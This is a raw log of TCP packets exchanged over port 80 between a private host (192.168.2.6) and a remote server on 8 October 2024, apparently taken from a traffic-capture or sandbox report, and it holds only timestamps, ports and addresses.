Oct 8, 2024 11:31:34.616803885 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616815090 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616827965 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616839886 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616841078 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.616853952 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616866112 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616878986 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616892099 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.616892099 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.616928101 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616940975 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616952896 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616964102 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616965055 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.616976976 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616988897 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.616992950 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.617002010 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617014885 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617016077 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.617033958 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.617646933 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617661953 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617672920 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617686033 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.617692947 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617707014 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617722988 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617736101 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617753029 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.617753029 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.617780924 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.617801905 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617814064 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617824078 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617835999 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617840052 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.617847919 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617861032 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617863894 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.617873907 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617886066 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.617909908 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.617909908 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.618383884 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.618582964 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.618593931 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.618607044 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.618644953 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.618668079 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.618680954 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.618693113 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.618704081 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.618716002 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.618716002 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.618755102 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.624350071 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.635083914 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.708934069 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.708956003 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.708978891 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.708992004 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709003925 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709014893 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709021091 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709027052 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709033966 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709044933 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.709124088 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709142923 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709153891 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.709155083 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709167004 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709180117 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709180117 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.709192991 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709204912 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.709207058 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709219933 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.709220886 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709234953 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709245920 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709247112 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.709261894 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709284067 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709291935 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.709311962 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.709706068 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709727049 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709741116 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709752083 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709765911 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709778070 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709796906 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709800005 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.709810019 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709820986 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709830999 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.709832907 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.709851980 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710030079 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710042953 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710055113 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710063934 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710083008 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710136890 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710150003 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710160017 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710170984 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710175037 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710187912 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710206032 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710218906 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710225105 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710231066 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710242987 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710249901 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710254908 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710282087 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710520029 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710707903 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710722923 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710737944 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710743904 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710750103 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710767984 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710778952 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710789919 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710802078 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710808039 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710813999 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710824013 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710828066 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710840940 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710840940 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710858107 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710880041 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710908890 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.710927963 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710941076 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710952997 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710966110 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710978031 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.710989952 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711004019 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711005926 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.711019039 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711033106 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711051941 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.711051941 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.711313963 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.711675882 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711689949 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711703062 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711720943 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711731911 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711738110 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.711746931 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711761951 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711777925 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.711782932 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711795092 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711806059 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711816072 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.711819887 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711832047 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711841106 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.711844921 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711858034 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711860895 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.711869955 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.711872101 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711886883 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711900949 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.711915016 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.711925983 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.714016914 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714045048 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714056969 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714062929 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714071035 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714092970 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714106083 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714119911 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714131117 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.714160919 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.714188099 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714201927 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714215994 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714217901 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.714230061 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714241982 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714251041 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.714255095 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714286089 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.714286089 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.714468002 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714520931 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714533091 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714545012 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714556932 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714576960 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.714639902 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.714672089 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.714709044 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.720463037 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.803471088 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803499937 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803513050 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803524971 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803538084 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803549051 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803561926 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803574085 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803580046 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.803625107 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.803668976 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803688049 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803699970 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803705931 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803710938 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803716898 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803723097 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803730011 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803741932 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803756952 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803769112 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803775072 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803780079 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.803781033 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803790092 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803795099 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803802967 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803807974 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803813934 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803819895 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803819895 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.803819895 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.803828001 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803833961 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803842068 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803847075 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803853035 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803858995 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803888083 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803896904 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803903103 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803908110 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803915024 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803920984 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803927898 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803932905 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803940058 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803946018 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.803956985 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.803992033 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804016113 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804028988 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804042101 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804053068 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804055929 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804060936 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804080009 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804085970 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804094076 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804105043 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804111004 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804116964 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804127932 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804127932 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804136992 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804150105 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804162025 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804167032 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804173946 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804186106 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804202080 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804212093 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804241896 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804265976 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804287910 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804296017 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804368973 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804387093 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804399967 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804410934 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804423094 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804433107 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804439068 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804454088 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804466009 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804472923 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804486036 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804486990 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804501057 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804518938 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804526091 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804529905 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804543018 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804550886 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804554939 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804567099 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804570913 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804579020 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804591894 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804595947 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804605007 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804631948 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804634094 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804642916 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804656982 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804658890 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804685116 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804748058 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804759979 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804770947 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804783106 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804800034 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804812908 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804817915 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804826975 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804838896 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804841042 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804852009 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804862022 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804881096 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804881096 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804893970 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804904938 CEST	80	49997	63.250.38.167	192.168.2.6
Oct 8, 2024 11:31:34.804910898 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.804919004 CEST	49997	80	192.168.2.6	63.250.38.167
Oct 8, 2024 11:31:34.805032969 CEST	80	49997	63.250.38.167	192.168.2.6
